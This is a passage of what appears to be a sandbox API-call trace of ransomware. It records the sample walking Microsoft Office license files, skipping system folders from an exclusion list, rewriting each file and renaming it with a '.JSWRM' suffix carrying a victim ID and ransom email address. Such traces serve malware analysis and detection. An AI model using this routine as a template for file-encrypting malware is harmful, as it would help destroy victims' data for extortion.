out: hHeap=0x1e0000) returned 1 [0109.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0109.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0109.674] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xead3ce9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xead3ce9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeae6e174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b93, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Trial-pl.xrm-ms", cAlternateFileName="PUB3EC~1.XRM")) returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.674] lstrcmpiW (lpString1="PublisherR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0109.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0109.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241100, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0109.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0109.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.675] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11155) returned 1 [0109.675] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0109.675] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0109.677] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.677] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0109.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.678] CloseHandle (hObject=0x45c) returned 1 [0109.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0109.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0109.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0109.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0109.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0109.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0109.679] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeae943d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeae943d9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaf52f93, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Trial-ppd.xrm-ms", cAlternateFileName="PUA598~1.XRM")) returned 1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.679] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.680] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.680] lstrcmpiW (lpString1="PublisherR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0109.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241330, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0109.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0109.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0109.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.681] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20904) returned 1 [0109.681] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24c1d0 [0109.681] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51a0, lpOverlapped=0x0) returned 1 [0109.684] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.684] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51a0, lpOverlapped=0x0) returned 1 [0109.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.684] CloseHandle (hObject=0x45c) returned 1 [0109.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0109.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0109.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0109.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0109.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0109.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.684] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0109.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0109.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0109.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0109.685] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeab26d98, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeab26d98, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeadaf5a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d56, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Trial-ul-oob.xrm-ms", cAlternateFileName="PUD3C4~1.XRM")) returned 1 [0109.685] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.685] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.685] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.685] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.685] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.686] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.686] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.686] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.686] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.686] lstrcmpiW (lpString1="PublisherR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0109.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0109.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Trial-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0109.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0109.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0109.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.687] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11606) returned 1 [0109.687] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0109.687] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0109.689] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.689] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0109.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.689] CloseHandle (hObject=0x45c) returned 1 [0109.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0109.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0109.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0109.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0109.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.690] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 